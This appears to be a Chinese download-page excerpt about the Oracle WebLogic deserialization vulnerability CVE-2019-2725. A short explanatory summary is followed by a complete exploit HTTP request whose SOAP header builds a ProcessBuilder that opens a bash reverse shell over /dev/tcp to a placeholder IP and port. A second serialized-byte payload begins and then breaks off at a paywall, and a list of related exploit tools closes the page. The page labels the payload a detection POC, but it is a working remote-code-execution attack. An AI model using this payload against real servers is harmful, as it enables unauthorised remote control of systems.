利用POC检测WebLogic反序列化漏洞CVE-2019-2725

CVE-2019-2725

需积分: 50 19 浏览量更新于2024-09-11 4 收藏 235KB TXT 举报

在2019年，Oracle WebLogic服务器遭遇了一个严重的反序列化漏洞，即CVE-2019-2725。这个漏洞允许攻击者通过精心构造的恶意请求，利用WebLogic应用程序中的序列化功能来执行任意代码，从而获取系统控制权限。由于其严重性，修复这一漏洞对于任何使用WebLogic的组织来说都是至关重要的。该检测POC（Proof of Concept，概念验证）文本文件提供了一个针对CVE-2019-2725的攻击示例，展示了如何构造一个POST请求来利用这个漏洞。请求头部分包含了特定的SOAP Action和WSA (Web Services Addressing)元数据，如`wsa:Action`和`wsa:RelatesTo`，这些用于指定操作的类型和请求的相关标识。请求体中包含了工作区域（WorkContext）的元数据，其中定义了一个`ProcessBuilder`对象，其内部是一个字符串数组，用于构建命令行调用，如`/bin/bash -c bash-i>&/dev/tcp/ip/port0>&1`。这个命令表示攻击者试图在WebLogic服务器上启动一个网络shell，通过TCP连接到指定的IP地址和端口，进一步进行远程控制操作。值得注意的是，攻击者利用了`fileName:.shell123.jsp`参数，这暗示着可能是一个恶意JSP文件，它会被解析并执行，从而触发反序列化过程，进而触发漏洞。`Content-Length:239842`表明请求体包含大量可能用于执行恶意代码的数据。在实际环境中，修复此漏洞的方法通常包括更新WebLogic服务器到最新版本，禁用不安全的功能，或者实施更严格的输入验证策略。同时，对应用程序代码进行审查和重构，以防止利用序列化漏洞进行攻击，也是必不可少的安全措施。总结起来，这段文本描述了一种针对WebLogic服务器的反序列化漏洞利用方法，以及提供了一个用于检测此漏洞的POC。理解并应用此类安全知识对于保护企业免受此类攻击至关重要。

POST /_async/AsyncResponseService HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
SOAPAction: ""
Content-Type: text/xml;charset=UTF-8
fileName: .shell123.jsp
Content-Length: 239842
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/ip/port 0>&1</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<array method="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
<void>
<array class="byte" length="4977">
<void index="0">
<byte>-84</byte>
</void>
<void index="1">
<byte>-19</byte>
</void>
<void index="3">
<byte>5</byte>
</void>
<void index="4">
<byte>115</byte>

剩余442页未读，继续阅读

greet1988

粉丝: 0
资源: 8

利用POC检测WebLogic反序列化漏洞CVE-2019-2725

WebLogic CVE-2019-2725补丁.zip

cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip

cve-2019-2725修复使用到的p28710912_1036_Generic.zip

CVE-2019-2725:WebLogic不安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用

反序列化漏洞检查工具 Weblogic XML CVE-2017-10271

cve-2017-10271-poc.py weblogic反序列化 WLS

cve-2018-2893-poc.py

【技术分享】WebLogic CVE-2021-2135分析及POC构造遇到的问题 .pdf

漫谈WebLogic-CVE-2020-25511

some_pocsuite:用于漏洞排查的pocsuite3验证POC代码

最新资源